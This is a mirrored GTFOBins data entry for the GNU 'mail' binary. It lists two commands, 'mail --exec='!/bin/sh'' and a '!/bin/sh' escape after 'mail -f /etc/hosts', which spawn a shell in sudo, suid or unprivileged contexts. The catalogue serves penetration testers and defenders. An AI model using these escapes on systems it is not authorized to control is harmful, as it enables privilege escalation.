1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-08 06:56:15 +01:00
GTFOBins.github.io/_gtfobins/mail

22 lines
305 B
Plaintext

---
functions:
shell:
- code: |-
mail --exec='!/bin/sh'
contexts:
sudo:
suid:
shell: true
unprivileged:
version: |-
GNU
- code: |-
mail -f /etc/hosts
!/bin/sh
contexts:
sudo:
suid:
shell: true
unprivileged:
...